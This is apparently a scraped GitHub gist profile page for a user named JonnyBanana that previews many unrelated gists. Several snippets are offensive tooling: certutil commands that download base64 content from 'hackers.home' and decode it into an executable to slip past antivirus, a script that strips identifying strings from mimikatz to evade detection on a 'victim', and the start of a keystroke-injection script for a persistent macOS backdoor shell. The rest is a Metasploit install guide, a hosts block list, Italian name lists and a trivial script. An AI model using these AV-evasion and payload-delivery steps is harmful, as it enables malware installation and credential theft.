🔥
Working from SapsLab

Jonny Banana JonnyBanana

  • SappohSamaWorkshop - Circuit Circus
  • Bologna - Italy
# certutil.exe bypass av on download + base64 Decoding
# First, base64-encode the malicious file so that to an edge device it just appears as harmless text.
# Then, once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64-encoded file
# into the executable. https://www.browserling.com/tools/file-to-base64
# This is illustrated in Xavier Mertens' handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
JonnyBanana / microsoft-dns-block.txt
Created February 9, 2021 00:51 — forked from VirtuBox/microsoft-dns-block.txt
Blocking Microsoft DNS hosts file
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 search.msn.com
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msn.com
0.0.0.0 a.rad.msn.com
0.0.0.0 ac3.msn.com
0.0.0.0 ads.msn.com
0.0.0.0 ads1.msn.com
0.0.0.0 b.ads1.msn.com
0.0.0.0 b.rad.msn.com

Image source

https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png

Try resizing it!

  • ![](https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png | width=100)
This post links my 3Box profile to my Github account! Web3 social profiles by 3Box.
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅
Create your profile today to start building social connection and trust online at https://3Box.io/
JonnyBanana / gist:d0a6d5b39c932614d100618354ad226f
Created November 19, 2019 02:10 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
JonnyBanana / cognomi.txt
Created November 18, 2019 01:56 — forked from pdesterlich/cognomi.txt
List of Italian surnames
-- DISCLAIMER --
this list is a collection of surnames found in Italy (not necessarily "Italian")
it is generated by automatically processing one or more civil-registry archives and is not checked in any way
it is therefore highly likely that it contains errors or typos
it is not, nor does it claim to be, a comprehensive list of all existing surnames
----------------
abbondanza
abu
accadia
JonnyBanana / nomi_italiani.txt
Created November 18, 2019 01:55 — forked from pdesterlich/nomi_italiani.txt
List of Italian first names
-- DISCLAIMER --
this list is a collection of first names found in Italy (not necessarily "Italian")
it is generated by automatically processing one or more civil-registry archives and is not checked in any way
it is therefore highly likely that it contains errors or typos
it is not, nor does it claim to be, a comprehensive list of all existing first names
----------------
abaco
abbondanza
abbondanzia
# script by JonnyBanana
#https://github.com/JonnyBanana
# this simple script asks to assign a name to a variable
#and then asks how many variables it must print on the monitor
# the output is like:
# a1 = ''
# a2 = ''
# a3 = ''
# a4 = ''
# a5 = ''